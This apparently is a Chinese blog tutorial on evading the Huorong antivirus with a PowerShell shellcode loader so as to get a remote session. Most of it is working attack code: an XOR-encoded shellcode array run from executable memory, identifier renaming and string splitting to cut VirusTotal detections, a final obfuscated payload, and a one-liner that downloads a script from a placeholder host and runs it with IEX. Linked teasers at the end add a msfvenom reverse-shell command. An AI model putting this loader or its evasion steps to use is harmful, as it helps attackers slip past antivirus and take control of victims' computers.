Powershell 过火绒免杀上线

payload生成

原生payload生成后被无情秒杀

powershell免杀制作

打开powershell命令行，将payload编码

1.新建一个变量h，用来接收之后编码的payload

$h= ''

2.把FromBase64String放入变量$k中

$k=[System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjIsajcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMYnZQcCPQsabgviut5qEtwnqLM1P/WSmYY5NZ+Ma6Y4+wqy6x8QlB6kAXrlVxdwM7y5/QSk93lTBKsMuOZBMABwpAHF6YvI3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwtATE5TQldKQU9GGANucGpmAxoNExgDdEpNR0xUUANtdwMVDRIYA3RsdBUXGAN3UUpHRk1XDBYNEwouKSMlEFzT6YeXw5abnZPfOiCfborrWnU/5BV7rollSoNrdYUP83wmPVcls5fvZykXV1cuZ/e2pk+A7+8bvQhRtiN+5fSMlld5T0oY5xRuqig/6FG2/MfQyb7Le75dhB+2sacVvXE0uTZza6YyXLzIx9Qoif5Po3wt1ysaEcSbIduXlWs3RlXJ7nGnP+69r3Uxc++P7iSHhLe0GHLELb1v03jRzRbOUfmLnGhepaXV7XmN8sHiWlWFM4Ak6V4XBlQ8V51f9d5wp0fwBfyNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEhMXDRERFg0SFhANERcbIzEXdVs=')

3.利用循环每次加个’,’，并且把编码后的数据转换成一行

$k | foreach {$h=$h+$_.ToString()+','}

4.输出编码后的payload

$h

整合为ps1脚本更方便

$h= ''
$k=[System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSBycktzKCMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMYnZQcCPQBCEOnRtGWA9JPbgviut5qEtwnqLM1P/WSmYY5NZ+Ma6Y4+wqy6x8QlB6kAXrlVxdwM7y5/QSk93lTBKsMuOZBMABwpAHF6YvI35TQldKQU9GGANucGpmAxoNExgDdEpNR0xUUANtdwMVDRIYA3RsdBUXGAN3UUpHRk1XDBYNEwouKSMlEFzT6YeXw5abnZPfOiCfborrWnU/5BV7rollSoNrdYUP83wmPVcls5fvZykXV1cuZ/e2pk+A7+8bvQhRtiN+5fSMlld5T0oY5xRuqig/6FG2/MfQyb7Le75dhB+2LT1KZD3+zcVvXE0uTZza6YyXLzIx9Qoif5Po3wt1y9hGg6LydpPI6DLJC9REcSbIduXlWs3RlXJ7nGnP+69r3Uxc++P7iSHhLe0GHLELb1v03jRzRbOUfmLnGhepaXV7XmN8sHiWlWFM4Ak6V4XBlQ8V51f9d5wp0fwBfyNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEhMXDRERFg0SFhANERcbIzEXdVs=')
$k | foreach {$h=$h+$_.ToString()+','}
$h

然后将编码得到的数据复制替换payload即可，注意去掉最后一个逗号”,“。

Set-StrictMode -Version 2$DoIt = @'
function func_get_proc_address {Param ($var_module, $var_procedure)     $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}function func_get_delegate_type {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()
}[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,220,220,220,12,98,118,80,112,35,208,4,33,14,157,27,70,88,15,73,61,184,47,138,235,121,168,75,112,158,162,204,212,255,214,74,102,24,228,214,126,49,174,152,227,236,42,203,172,124,66,80,122,144,5,235,149,92,93,192,206,242,231,244,18,147,221,229,76,18,172,50,227,153,4,192,1,194,144,7,23,166,47,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,22,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,26,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,10,46,41,35,37,16,92,211,233,135,151,195,150,155,157,147,223,58,32,159,110,138,235,90,117,63,228,21,123,174,137,101,74,131,107,117,133,15,243,124,38,61,87,37,179,151,239,103,41,23,87,87,46,103,247,182,166,79,128,239,239,27,189,8,81,182,35,126,229,244,140,150,87,121,79,74,24,231,20,110,170,40,63,232,81,182,252,199,208,201,190,203,123,190,93,132,31,182,45,61,74,100,61,254,205,197,111,92,77,46,77,156,218,233,140,151,47,50,49,245,10,34,127,147,232,223,11,117,203,216,70,131,162,242,118,147,200,232,50,201,11,212,68,113,38,200,118,229,229,90,205,209,149,114,123,156,105,207,251,175,107,221,76,92,251,227,251,137,33,225,45,237,6,28,177,11,111,91,244,222,52,115,69,179,148,126,98,231,26,23,169,105,117,123,94,99,124,176,120,150,149,97,76,224,9,58,87,133,193,149,15,21,231,87,253,119,156,41,209,252,1,127,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,23,13,17,17,22,13,18,22,16,13,17,23,27,35,49,23,117,91)for ($x = 0; $x -lt $var_code.Count; $x++) {$var_code[$x] = $var_code[$x] -bxor 35
}$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@If ([IntPtr]::size -eq 8) {start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {IEX $DoIt
}

火绒免杀

VT检查杀率(60/13)，还需要继续改造

修改关键字，规避静态特征查杀，时间问题只修改了小部分

IEX $DoIt -- i`ex $DoIt
IEX $a  --  ie`x $a
$var_runme -- $vrunme
$var_buffer -- $vbuffer
func_get_proc_address --  func_k
func_get_delegate_type -- func_l
$var_type_builder -- $vk
$var_parameters -- $vp
$var_return_type-- $ve
$var_procedure -- $v_pro

建议使用工具直接替换

到这里，查杀率60/5，还需要再改改

最终payload

Set-StrictMode -Version 2$DoIt = @'
function func_k {Param ($var_module, $v_pro)        $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Mic'+'rosoft.Win32.Unsa'+'feNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetPro'+'cAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetM'+'oduleH'+'andle')).Invoke($null, @($var_module)))), $v_pro))
}function func_l {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $vp,[Parameter(Position = 1)] [Type] $ve = [Void])$vk = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('Refle'+'ctedDele'+'gate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMem'+'oryModule', $false).DefineType('MyDelega'+'teType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])$vk.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $vp).SetImplementationFlags('Runtime, Managed')$vk.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $ve, $vp).SetImplementationFlags('Runtime, Managed')return $vk.CreateType()
}[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,116,116,75,25,117,90,132,220,246,202,167,35,35,35,120,18,234,114,114,73,32,114,114,75,115,40,35,35,112,115,75,116,170,188,229,220,246,200,83,120,18,241,113,75,35,33,99,167,113,113,113,112,113,115,75,200,118,13,24,220,246,170,229,160,224,115,18,220,116,116,73,220,112,117,75,14,37,59,88,220,246,166,227,44,167,224,34,35,35,18,220,166,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,10,46,41,35,37,16,92,211,233,135,151,195,150,155,157,147,223,58,32,159,110,138,235,90,117,63,228,21,123,174,137,101,74,131,107,117,133,15,243,124,38,61,87,37,179,151,239,103,41,23,87,87,46,103,247,182,166,79,128,239,239,27,189,8,81,182,35,126,229,244,140,150,87,121,79,74,24,231,20,110,170,40,63,232,81,182,252,199,208,201,190,203,123,190,93,132,31,182,45,61,74,100,61,254,205,197,111,92,77,46,77,156,218,233,140,151,47,50,49,245,10,34,127,147,232,223,11,117,203,216,70,131,162,242,118,147,200,232,50,201,11,212,68,113,38,200,118,229,229,90,205,209,149,114,123,156,105,207,251,175,107,221,76,92,251,227,251,137,33,225,45,237,6,28,177,11,111,91,244,222,52,115,69,179,148,126,98,231,26,23,169,105,117,123,94,99,124,176,120,150,149,97,76,224,9,58,87,133,193,149,15,21,231,87,253,119,156,41,209,252,1,127,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,23,13,17,17,22,13,18,22,16,13,17,23,27,35,49,23,117,91)for ($x = 0; $x -lt $var_code.Count; $x++) {$var_code[$x] = $var_code[$x] -bxor 35
}$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_k kernel32.dll VirtualAlloc), (func_l @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$vbuffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $vbuffer, $var_code.length)$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vbuffer, (func_l @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@If ([IntPtr]::size -eq 8) {start-job { param($a) ie`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {i`ex $DoIt
}

然后使用powershell远程下载并通过IEX运行脚本得到会话权限

powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''http://xxx.com/x.ps1'')'.Replace('11','adString');IEX ($a+$b)"

或者手动执行

c:\windows\system32\xx>d:
d:\>cd D:\wwwroot\xx\xxFile
D:\wwwroot\xx\xxFile>powershell -ExecutionPolicy bypass -File ./x.ps1

内容浅显，没什么技术含量，不足之处欢迎师傅们指点和纠正，感激不尽。

Powershell 过火绒免杀上线相关推荐

使用powershell免杀上线CS的新方式---利用图片
文章目录利用工具模拟上线总结参考文章利用工具 Invoke-PSImage 任意一张图片模拟上线 1.使用cs生成一个powershell的payload. 2.执行工具脚本并保存生成的上 ...
二进制免杀-火绒免杀研究
┌──(kali㉿kali)-[~] └─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.93.134 lport=44 ...
（记录向）Python反序列化免杀上线CS（并使用Shielden加密绕过360）
1.首先cs生成一个64位的Python Payload 2.截取其中的Payload,并进行base64编码. 3.把这一串子base64放到VPS上.并开启web服务. python3 -m ht ...
远控免杀专题(24)-CACTUSTORCH免杀
转载:https://mp.weixin.qq.com/s/g0CYvFMsrV7bHIfTnSUJBw 免杀能力一览表几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了By ...
Powershell免杀系列（二）
技术交流关注微信公众号 Z20安全团队 , 回复加群 ,拉你入群一起讨论技术. 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看. 正文 powershell的免杀⽅法有很多,对代码进 ...
红队培训班作业 | 免杀过360和火绒四种方法大对比
文章来源|MS08067 红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员) 按老师要求尝试完成布置的作业如下: 环境准备: Kali linux安装cs4.2,Windows7系统安装 ...
远控免杀从入门到实践(6)-代码篇-Powershell
郑重声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! <远控免杀从入门到实践>系列文章目录: 1.远控免杀从 ...
老树开新花之shellcode_launcher免杀Windows Defender
微信公众号:乌鸦安全扫取二维码获取更多信息! 免杀效果静态免杀动态免杀效果(指的是可执行命令) 1. 准备条件本文中的免杀方式在我写完文章之后,免杀基本已经失效,毕竟是见光死,所以仅供各位师傅 ...
shellcode免杀框架内附SysWhispers2_x86直接系统调用
1.概述之前分析CS4的stage时,有老哥让我写下CS免杀上线方面知识,遂介绍之前所写shellcode框架,该框架的shellcode执行部分利用系统特性和直接系统调用(Direct Syste ...

Powershell 过火绒免杀上线

payload生成

powershell免杀制作

Powershell 过火绒免杀上线相关推荐

最新文章

热门文章